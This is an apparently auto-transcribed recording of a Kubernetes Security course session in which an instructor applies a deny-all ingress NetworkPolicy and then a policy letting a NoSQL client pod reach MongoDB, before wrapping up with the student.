we still have the policy that denies
all incoming traffic to production.
We haven't cleared yet no SQL client,
the front end against the back end.
Let's try it from web console.
What do you think it should happen here on web console?
It should still have no connection.
That is right, because we didn't create any,
any rule changing that.
And this is actually something that we may want.
So if you try to execute the MongoDB client,
it will fail.
There no SQL client, it will fail as well.
It will time out.
So now we're going to apply,
I mean, we need our application to work, right?
So at least the basics.
So we're going to apply a policy that permits the traffic
from no SQL client to Mongo.
And this is the policy.
So again, the namespace will be production.
It will apply to MongoDB, to the pod selector MongoDB.
And it will use the MongoDB port for default.
And the original traffic will come from the pod selector,
no SQL client.
So this rule, it's allowing, it's, I mean,
we are creating a policy for the namespace production,
for the pod MongoDB, allowing ingress of traffic
to be directed to the port of MongoDB,
originated from the pod selector, no SQL client.
This is what this policy says, right?
So let's apply that.
Q, C, L, apply dash F.
And we're going to call Amixter.
And if we go and check here,
if we try to connect again, it should work.
It worked.
Yeah.
Oh, that's instant.
Yeah, amazing, right?
Okay, so let's wrap up for today.
Tomorrow we will finish this policies,
this network policies.
And move on to the security contacts.
So to work with those and with the role-based access
and the tools and all the other labs.
So do you have any question regarding
what we have discussed today?
And anything that you feel that needs to improve
or change or is the pace right?
No, the pace is right.
Yeah, I think it's just that would these nodes
be available somewhere towards the end of the session
if I want to go back and check it out.
Well, actually in the repo,
it's everything that we are doing.
So the idea is that you can clone that
and the PDF is there, the presentation as well.
So, and there is actually, now that you say that,
I will suggest you to do this,
what we are going to do here,
to save the history of everything that we have done so far.
So you can copy that afterwards and take it with you.
So let's exit, close all the consoles.
And in here, exit.
Because there is a bad thing that the servers
are automatically powered off later in the night.
Okay.
So that affects us.
So once you have done exiting all the terminals,
open up the console again
with history.
If you want history, you can save your history
wherever you want to save it.
Tomorrow we can take a...
Actually, I'm going to save it in the zip.
It saves the dates, so it works that way as well.
Okay.
Perfect.
So, Kiriti, have a good evening.
Enjoy your Australian weather.
And I'll see you tomorrow.
All right, thank you.
Thank you, have a great one.
You too, goodbye, have a good night.
Bye-bye.                

on 2022-11-21

Visit the Kubernetes Security (AU) course recordings page

2 videos